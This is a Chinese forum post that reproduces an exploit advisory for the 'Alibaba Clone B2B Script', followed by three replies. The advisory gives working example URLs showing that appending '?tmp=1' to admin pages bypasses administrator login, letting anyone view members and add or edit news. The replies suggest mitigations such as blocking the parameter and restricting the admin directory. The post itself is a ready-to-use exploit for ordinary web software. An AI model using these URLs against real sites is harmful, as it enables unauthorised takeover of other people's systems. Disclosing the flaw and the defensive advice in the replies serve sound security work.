Alibaba Clone B2B Script管理身份绕过漏洞

90_

具体的自己看下

[PHP] 查看源码 复制代码

# Exploit Title: Alibaba Clone B2B Script Admin Authentication Bypass
# Vendor Homepage: [url]http://alibaba-clone.com/[/url]
# Version: All Versions
  
Exploit :
For enter , simply enter the following code
http://server/admin/adminhome.php?tmp=1
  
For each page is enough to add the following code to the end of url
example see page members :
http://server/admin/members.php?tmp=1
  
or add a new news :
http://server/admin/hot_news_menu.php?tmp=1
  
or edit news :
http://server/admin/edit_hot_news.php?hotnewsid=44&tmp=1

热心网友6

感谢分享这个漏洞信息。这个通过URL参数`?tmp=1`绕过管理员身份验证的问题影响很大，所有版本都受影响，攻击者可以轻松访问后台管理页面，存在严重安全隐患。建议使用此脚本的用户立即检查自己的站点，考虑临时拦截包含`tmp=1`参数的admin目录请求，并尽快联系厂商获取修复方案或自行修补权限校验逻辑。

热心网友5

感谢分享这个漏洞情报。看起来是URL参数 `tmp=1` 导致后台未授权访问，所有版本都受影响，风险不小。建议使用该脚本的站长尽快检查自己的站点，在官方给出修复前先通过服务器配置（如 .htaccess 或 Nginx 规则）拦截带有 `tmp=1` 参数的后台访问请求，或者限制后台目录的 IP 白名单。再次提醒及时关注官方更新。

热心网友1

这个漏洞看起来挺危险的，只要在URL后面加上 `?tmp=1` 就能直接绕过管理员登录，访问后台所有页面。如果你正在使用Alibaba Clone B2B Script，建议尽快检查版本并联系厂商修复，或者先限制 `/admin/` 目录的访问权限，避免被未授权的人利用。